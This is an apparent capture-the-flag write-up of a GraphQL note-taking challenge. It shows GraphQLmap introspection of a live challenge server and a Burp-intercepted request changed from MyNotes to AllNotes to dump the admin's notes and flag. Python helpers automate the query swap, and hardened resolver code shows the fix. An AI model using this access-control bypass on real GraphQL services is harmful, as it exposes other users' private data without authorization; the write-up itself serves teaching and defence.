Challenge Info

I don't think that replacing your REST APIs means that you don't need access controls. Can you read the admin's tasks from this minimal note taking application?

Solution

The title of this challenge pretty much tells us straight away that we're dealing with GraphQL.

Visiting the website:

I used GraphQLmap to get a picture of the GraphQL API we're dealing with. Its dump_new command sends an introspection query to the /graphql endpoint and prints every query, mutation and type it gets back, which works here because introspection has been left enabled.

┌─[s1gh@fsociety]─[~/Documents/HackTheBox/HTB-Business-CTF-2021/Web/NoteQL/GraphQLmap]
└──╼ $ python3 graphqlmap.py -u http://165.227.225.92:32634/graphql
   _____                 _      ____  _                            
  / ____|               | |    / __ \| |                           
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __  
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \ 
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ 
                  | |                                       | |    
                  |_|                                       |_|    
                              Author: @pentest_swissky Version: 1.0 
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Query
        AllNotes[Post]: 
        Note[]: id (ID!), 
        MyNotes[Post]: 
        NotesFrom[Post]: author (String!), 
Post
        id[]: 
        title[]: 
        author[]: 
        completed[]: 
Mutation
        createNote[]: title (String!), 
        updateNote[]: id (ID!), title (String!), author (String!), 
        completeNote[]: id (ID!), 
        deleteNote[]: id (ID!), 
__Schema
__Type
__Field
__InputValue
__EnumValue
__Directive
GraphQLmap >

We see a query called AllNotes which, unlike Note (id) and NotesFrom (author), takes no arguments at all and, unlike MyNotes, is not obviously tied to the current user. That makes it the first thing to try.

After adding a note, clicking on it and intercepting the resulting request in Burp:

I change MyNotes to AllNotes in the intercepted query, leaving the selection set as it is, in order to dump every note stored in the application. The server never checks who is asking, so the admin's notes come back alongside mine.
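As an added example (not part of the original writeup and not GraphQLmap's code), here are the two steps above in plain Python: parse a standard introspection response into the root fields with their argument types, pick out the root fields that return a list and take no arguments, and rewrite the intercepted MyNotes request so that it calls AllNotes instead. The introspection response, the request body and the AllNotes response are all constructed here from the schema dump above; whether each field returns a list is read from the dump's [Post] notation, and the scalar types of Post's fields and the exact query the front end sends are assumptions.

```python
import json
import re

# --- Constructed sample data (not captured from the challenge server) -----------------

def _scalar(name):
    return {"kind": "SCALAR", "name": name, "ofType": None}

def _obj(name):
    return {"kind": "OBJECT", "name": name, "ofType": None}

def _list(inner):
    return {"kind": "LIST", "name": None, "ofType": inner}

def _non_null(inner):
    return {"kind": "NON_NULL", "name": None, "ofType": inner}

def _field(name, typ, **args):
    return {"name": name, "type": typ,
            "args": [{"name": a, "type": t} for a, t in args.items()]}

# Shape follows the standard __schema introspection result; names follow the GraphQLmap dump.
# Assumption: [Post] in the dump means a GraphQL list, and Post's scalar types are guessed.
INTROSPECTION_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            _field("AllNotes", _list(_obj("Post"))),
            _field("Note", _obj("Post"), id=_non_null(_scalar("ID"))),
            _field("MyNotes", _list(_obj("Post"))),
            _field("NotesFrom", _list(_obj("Post")), author=_non_null(_scalar("String"))),
        ]},
        {"kind": "OBJECT", "name": "Post", "fields": [
            _field("id", _scalar("ID")), _field("title", _scalar("String")),
            _field("author", _scalar("String")), _field("completed", _scalar("Boolean")),
        ]},
    ],
}}}

# Assumption: the operation the front end sends when you open your own notes.
MYNOTES_REQUEST = {"query": "query { MyNotes { id title author completed } }", "variables": {}}

# Constructed AllNotes response as seen by a user called "s1gh"; the admin row carries the flag.
ALLNOTES_RESPONSE = {"data": {"AllNotes": [
    {"id": "1", "title": "HTB{n0b0dy_c0ntr0ls_m3!!}", "author": "admin", "completed": False},
    {"id": "2", "title": "test", "author": "s1gh", "completed": False},
]}}

# --- Step 1: read the schema ---------------------------------------------------------

def type_to_str(t):
    """Render an introspection type reference as SDL text: Post, [Post], ID!, [Post]!"""
    if t["kind"] == "NON_NULL":
        return type_to_str(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_to_str(t["ofType"]) + "]"
    return t["name"]

def root_fields(resp, root="queryType"):
    """Map each root field of Query (or Mutation) to its return type and its {arg: type}."""
    schema = resp["data"]["__schema"]
    if schema.get(root) is None:
        return {}
    root_name = schema[root]["name"]
    for t in schema["types"]:
        if t["name"] == root_name:
            return {f["name"]: {"type": type_to_str(f["type"]),
                                "args": {a["name"]: type_to_str(a["type"]) for a in f["args"]}}
                    for f in t["fields"]}
    return {}

def unscoped_list_fields(fields):
    """Root fields that return a list and take no arguments: listings that may not be scoped to the caller."""
    return sorted(n for n, f in fields.items() if f["type"].startswith("[") and not f["args"])

# --- Step 2: swap the root field in the intercepted request --------------------------

def swap_root_field(request, old, new):
    """Copy of the request body that calls `new` instead of `old`; the selection set is unchanged."""
    body = json.loads(json.dumps(request))  # deep copy, the original stays untouched
    body["query"] = re.sub(r"\b%s\b" % re.escape(old), new, body["query"], count=1)
    return body

def leaked_notes(resp, field, me):
    """Notes in the response that belong to someone else: what the server should have withheld."""
    return [n for n in resp["data"][field] if n["author"] != me]

if __name__ == "__main__":
    fields = root_fields(INTROSPECTION_RESPONSE)
    for name, f in fields.items():
        print(f"{name}({', '.join(f'{a}: {t}' for a, t in f['args'].items())}): {f['type']}")
    print("candidates:", unscoped_list_fields(fields))
    print(json.dumps(swap_root_field(MYNOTES_REQUEST, "MyNotes", "AllNotes")))
    for n in leaked_notes(ALLNOTES_RESPONSE, "AllNotes", "s1gh"):
        print("leaked:", n["author"], n["title"])
```

Against a live target you would POST the standard introspection query to /graphql, feed the JSON into root_fields, and send the output of swap_root_field with the same cookies Burp captured; the check in leaked_notes is what tells you the listing is not scoped to the caller.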

And here we find the flag!

Flag: HTB{n0b0dy_c0ntr0ls_m3!!}
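The challenge text makes the point that swapping REST for GraphQL does not remove the need for access control. As an added example (the writeup does not show the challenge's source, so this is not its code, and it uses no GraphQL library), here is the resolver side in plain Python: the AllNotes resolver as it evidently behaves, next to a version gated on a server-side role, plus a user-scoped MyNotes, an argument-checked NotesFrom and an object-level Note resolver. The Note dataclass, the per-request context dict and the role names are assumptions; the resolver names and arguments come from the schema dump.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Note:
    id: str
    title: str
    author: str
    completed: bool = False

# Constructed store standing in for the app's database.
NOTES = [
    Note("1", "HTB{n0b0dy_c0ntr0ls_m3!!}", "admin"),
    Note("2", "test", "s1gh"),
]

class Unauthorized(Exception):
    """Raised by a resolver that refuses the request; a real server maps this to a GraphQL error."""

# ctx is the per-request context a GraphQL server hands to every resolver. Here it is a dict
# with the authenticated "user" (None when anonymous) and "role", both populated from the
# session on the server side, never from anything in the query.

def all_notes_vulnerable(ctx, args=None, store=NOTES):
    # Exactly the behaviour exploited above: the resolver never looks at ctx.
    return list(store)

def all_notes_hardened(ctx, args=None, store=NOTES):
    # A global listing is a privileged operation: gate it on a server-side role
    # (or do not expose the field at all).
    if ctx.get("role") != "admin":
        raise Unauthorized("AllNotes requires the admin role")
    return list(store)

def my_notes(ctx, args=None, store=NOTES):
    # Scope by the authenticated user; the client cannot influence which author is used.
    if ctx.get("user") is None:
        raise Unauthorized("login required")
    return [n for n in store if n.author == ctx["user"]]

def notes_from(ctx, args, store=NOTES):
    # author comes from the client, so without this check it is AllNotes by another name.
    author = args["author"]
    if ctx.get("user") != author and ctx.get("role") != "admin":
        raise Unauthorized("cannot read another user's notes")
    return [n for n in store if n.author == author]

def note(ctx, args, store=NOTES):
    # Object-level check: look the note up first, then compare its owner with the caller.
    for n in store:
        if n.id == args["id"]:
            if n.author != ctx.get("user") and ctx.get("role") != "admin":
                raise Unauthorized("not your note")
            return n
    return None

# Root resolver maps. The root field name in the query selects the function, which is why
# changing MyNotes to AllNotes in the request was all the attack needed.
VULNERABLE = {"AllNotes": all_notes_vulnerable, "MyNotes": my_notes}
HARDENED = {"AllNotes": all_notes_hardened, "MyNotes": my_notes,
            "NotesFrom": notes_from, "Note": note}

def execute(resolvers, root_field, ctx, **args):
    """Tiny stand-in for a GraphQL executor: dispatch one root field with the request context."""
    return resolvers[root_field](ctx, args)

def is_denied(resolvers, root_field, ctx, **args):
    """True if the resolver refuses the request, False if it returns data."""
    try:
        execute(resolvers, root_field, ctx, **args)
    except Unauthorized:
        return True
    return False

if __name__ == "__main__":
    me = {"user": "s1gh", "role": "user"}
    print("vulnerable AllNotes:", [n.author for n in execute(VULNERABLE, "AllNotes", me)])
    print("hardened AllNotes denied:", is_denied(HARDENED, "AllNotes", me))
    print("MyNotes:", [n.title for n in execute(HARDENED, "MyNotes", me)])
```

The pattern is the same one REST handlers need: every resolver that touches user data reads the caller's identity from the request context and either filters by it or compares it with the owner of the object it is about to return. Schema-level tricks such as disabling introspection only hide AllNotes from GraphQLmap; they do not stop anyone who guesses the name.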